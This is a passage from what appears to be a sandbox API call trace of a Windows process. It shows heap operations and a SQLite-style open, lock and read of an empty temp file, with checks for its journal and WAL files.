MemoryPointer=0x3929b20) returned 0x822 [0163.771] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3929a50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0163.771] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x5c) returned 0x392a350 [0163.771] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a350) returned 0x5c [0163.771] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7219.tmp", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2e [0163.771] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x62) returned 0x395b8c8 [0163.771] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x62 [0163.771] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7219.tmp", nBufferLength=0x31, lpBuffer=0x395b8c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7219.tmp", lpFilePart=0x0) returned 0x2d [0163.771] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a350) returned 0x5c [0163.771] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a350 | out: hHeap=0x2dc0000) returned 1 [0163.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7219.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0163.771] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x2e) returned 0x392a350 [0163.771] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a350) returned 0x2e [0163.771] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x62 [0163.771] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b8c8 | out: hHeap=0x2dc0000) returned 1 [0163.771] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a350) returned 0x2e [0163.771] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a350 | out: hHeap=0x2dc0000) returned 1 [0163.771] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x281) returned 0x392a350 [0163.771] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a350) returned 0x281 [0163.771] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b20) returned 0x822 [0163.771] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b20 | out: hHeap=0x2dc0000) returned 1 [0163.771] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x5c) returned 0x392a5e0 [0163.771] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a5e0) returned 0x5c [0163.771] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7219.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7219.tmp"), fInfoLevelId=0x0, lpFileInformation=0x2df36c | out: lpFileInformation=0x2df36c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe4da9b10, ftCreationTime.dwHighDateTime=0x1d59514, ftLastAccessTime.dwLowDateTime=0xe4da9b10, ftLastAccessTime.dwHighDateTime=0x1d59514, ftLastWriteTime.dwLowDateTime=0x85d166b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0163.771] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7219.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7219.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0163.772] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a5e0) returned 0x5c [0163.772] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a5e0 | out: hHeap=0x2dc0000) returned 1 [0163.772] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1000) returned 0x394c1b8 [0163.772] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0x1000 [0163.772] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0x1000 [0163.772] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x74) returned 0x392a5e0 [0163.772] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a5e0) returned 0x74 [0163.772] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x400) returned 0x3929b20 [0163.772] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b20) returned 0x400 [0163.772] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x392a660 [0163.772] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a660) returned 0x54 [0163.772] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x392a6c0 [0163.772] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a6c0) returned 0x54 [0163.772] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x22) returned 0x394b988 [0163.772] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b988) returned 0x22 [0163.772] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a840 [0163.772] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a840) returned 0x10 [0163.773] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1d4c0) returned 0x392bf70 [0163.773] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392bf70) returned 0x1d4c0 [0163.773] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392bf70) returned 0x1d4c0 [0163.773] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a50) returned 0x2f [0163.773] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929a50 | out: hHeap=0x2dc0000) returned 1 [0163.773] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b878) returned 0xb5 [0163.773] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b878 | out: hHeap=0x2dc0000) returned 1 [0163.773] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b848) returned 0x28 [0163.773] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b848 | out: hHeap=0x2dc0000) returned 1 [0163.773] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392a8a0 [0163.773] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8a0) returned 0xe [0163.773] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x50) returned 0x394b848 [0163.773] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b848) returned 0x50 [0163.773] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a8e8 [0163.773] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8e8) returned 0xa [0163.773] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x80) returned 0x394b8a0 [0163.773] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b8a0) returned 0x80 [0163.773] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a9c0 [0163.773] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9c0) returned 0xa [0163.773] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392a978 [0163.773] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a978) returned 0xe [0163.773] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xd) returned 0x392a9d8 [0163.773] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9d8) returned 0xd [0163.773] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x9) returned 0x392a7b0 [0163.773] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7b0) returned 0x9 [0163.773] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a7c8 [0163.774] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7c8) returned 0x10 [0163.774] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x3929f28 [0163.774] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f28) returned 0xe0 [0163.774] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x3949438 [0163.774] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0163.774] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0163.774] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0163.774] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949438 | out: hHeap=0x2dc0000) returned 1 [0163.774] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f28) returned 0xe0 [0163.774] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929f28 | out: hHeap=0x2dc0000) returned 1 [0163.774] LockFileEx (in: hFile=0x15c, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2dea20 | out: lpOverlapped=0x2dea20) returned 1 [0163.774] LockFileEx (in: hFile=0x15c, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2dea14 | out: lpOverlapped=0x2dea14) returned 1 [0163.774] UnlockFileEx (in: hFile=0x15c, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2dea24 | out: lpOverlapped=0x2dea24) returned 1 [0163.774] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a567, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0163.774] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x6c) returned 0x3929f28 [0163.774] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f28) returned 0x6c [0163.774] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7219.tmp-journal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7219.tmp-journal"), fInfoLevelId=0x0, lpFileInformation=0x2dea24 | out: lpFileInformation=0x2dea24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0163.774] GetLastError () returned 0x2 [0163.774] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f28) returned 0x6c [0163.774] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929f28 | out: hHeap=0x2dc0000) returned 1 [0163.774] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a59d, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0163.774] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x64) returned 0x395b8c8 [0163.774] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0163.774] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7219.tmp-wal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7219.tmp-wal"), fInfoLevelId=0x0, lpFileInformation=0x2dea34 | out: lpFileInformation=0x2dea34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0163.774] GetLastError () returned 0x2 [0163.774] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0163.775] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b8c8 | out: hHeap=0x2dc0000) returned 1 [0163.775] GetFileSize (in: hFile=0x15c, lpFileSizeHigh=0x2dea60 | out: lpFileSizeHigh=0x2dea60*=0x0) returned 0x0 [0163.775] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x14c80) returned 0x395c8b0 [0163.775] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395c8b0) returned 0x14c80 [0163.775] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395c8b0) returned 0x14c80 [0163.777] UnlockFileEx (in: hFile=0x15c, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2de6f8 | out: lpOverlapped=0x2de6f8) returned 1 [0163.777] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x13) returned 0x394ba30 [0163.777] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394ba30) returned 0x13 [0163.777] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x50) returned 0x3929f28 [0163.777] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f28) returned 0x50 [0163.777] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a900 [0163.777] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a900) returned 0xa [0163.777] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x80) returned 0x394d1d8 [0163.777] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394d1d8) returned 0x80 [0163.777] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a810 [0163.777] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a810) returned 0xa [0163.777] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392a960 [0163.777] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a960) returned 0xe [0163.777] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xd) returned 0x392a9a8 [0163.777] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9a8) returned 0xd [0163.777] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x9) returned 0x392a828 [0163.777] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a828) returned 0x9 [0163.777] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a798 [0163.777] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a798) returned 0x10 [0163.777] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x3929f80 [0163.777] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f80) returned 0xe0 [0163.777] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x3949438 [0163.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0163.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0163.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0163.778] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949438 | out: hHeap=0x2dc0000) returned 1 [0163.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f80) returned 0xe0 [0163.778] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929f80 | out: hHeap=0x2dc0000) returned 1 [0163.778] LockFileEx (in: hFile=0x15c, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2df200 | out: lpOverlapped=0x2df200) returned 1 [0163.778] LockFileEx (in: hFile=0x15c, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2df1f4 | out: lpOverlapped=0x2df1f4) returned 1 [0163.778] UnlockFileEx (in: hFile=0x15c, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2df204 | out: lpOverlapped=0x2df204) returned 1 [0163.778] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a567, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0163.778] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x6c) returned 0x3929f80 [0163.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f80) returned 0x6c [0163.778] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a567, cbMultiByte=-1, lpWideCharStr=0x3929f80, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7219.tmp-journal") returned 54 [0163.778] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7219.tmp-journal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7219.tmp-journal"), fInfoLevelId=0x0, lpFileInformation=0x2df204 | out: lpFileInformation=0x2df204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0163.778] GetLastError () returned 0x2 [0163.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f80) returned 0x6c [0163.778] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929f80 | out: hHeap=0x2dc0000) returned 1 [0163.778] ReadFile (in: hFile=0x15c, lpBuffer=0x2df280, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x2df254, lpOverlapped=0x2df234 | out: lpBuffer=0x2df280, lpNumberOfBytesRead=0x2df254*=0x0, lpOverlapped=0x2df234) returned 0 [0163.778] GetLastError () returned 0x26 [0163.778] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a59d, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0163.778] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x64) returned 0x395b8c8 [0163.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0163.778] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a59d, cbMultiByte=-1, lpWideCharStr=0x395b8c8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7219.tmp-wal") returned 50 [0163.778] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7219.tmp-wal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7219.tmp-wal"), fInfoLevelId=0x0, lpFileInformation=0x2df214 | out: lpFileInformation=0x2df214*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0163.779] GetLastError () returned 0x2 [0163.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0163.779] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b8c8 | out: hHeap=0x2dc0000) returned 1 [0163.779] GetFileSize (in: hFile=0x15c, lpFileSizeHigh=0x2df240 | out: lpFileSizeHigh=0x2df240*=0x0) returned 0x0 [0163.779] UnlockFileEx (in: hFile=0x15c, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2df230 | out: lpOverlapped=0x2df230) returned 1 [0163.779] CloseHandle (hObject=0x15c) returned 1 [0163.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0x1000 [0163.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0x1000 [0163.779] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394c1b8 | out: hHeap=0x2dc0000) returned 1 [0163.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395c8b0) returned 0x14c80 [0163.779] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395c8b0 | out: hHeap=0x2dc0000) returned 1 [0163.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b20) returned 0x400 [0163.779] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b20 | out: hHeap=0x2dc0000) returned 1 [0163.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a5e0) returned 0x74 [0163.779] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a5e0 | out: hHeap=0x2dc0000) returned 1 [0163.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a350) returned 0x281 [0163.779] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a350 | out: hHeap=0x2dc0000) returned 1 [0163.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8e8) returned 0xa [0163.779] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a8e8 | out: hHeap=0x2dc0000) returned 1 [0163.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9c0) returned 0xa [0163.779] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a9c0 | out: hHeap=0x2dc0000) returned 1 [0163.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a978) returned 0xe [0163.779] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a978 | out: hHeap=0x2dc0000) returned 1 [0163.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9d8) returned 0xd [0163.779] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a9d8 | out: hHeap=0x2dc0000) returned 1 [0163.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7b0) returned 0x9 [0163.779] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a7b0 | out: hHeap=0x2dc0000) returned 1 [0163.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b8a0) returned 0x80 [0163.779] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b8a0 | out: hHeap=0x2dc0000) returned 1 [0163.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8a0) returned 0xe [0163.780] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a8a0 | out: hHeap=0x2dc0000) returned 1 [0163.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b848) returned 0x50 [0163.780] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b848 | out: hHeap=0x2dc0000) returned 1 [0163.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7c8) returned 0x10 [0163.780] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a7c8 | out: hHeap=0x2dc0000) returned 1 [0163.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a660) returned 0x54 [0163.780] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a660 | out: hHeap=0x2dc0000) returned 1 [0163.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ac0) returned 0x54 [0163.780] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929ac0 | out: hHeap=0x2dc0000) returned 1 [0163.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a88) returned 0x30 [0163.780] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929a88 | out: hHeap=0x2dc0000) returned 1 [0163.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a900) returned 0xa [0163.780] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a900 | out: hHeap=0x2dc0000) returned 1 [0163.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a810) returned 0xa [0163.780] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a810 | out: hHeap=0x2dc0000) returned 1 [0163.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a960) returned 0xe [0163.780] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a960 | out: hHeap=0x2dc0000) returned 1 [0163.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9a8) returned 0xd [0163.780] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a9a8 | out: hHeap=0x2dc0000) returned 1 [0163.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a828) returned 0x9 [0163.780] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a828 | out: hHeap=0x2dc0000) returned 1 [0163.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394d1d8) returned 0x80 [0163.780] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394d1d8 | out: hHeap=0x2dc0000) returned 1 [0163.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394ba30) returned 0x13 [0163.780] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394ba30 | out: 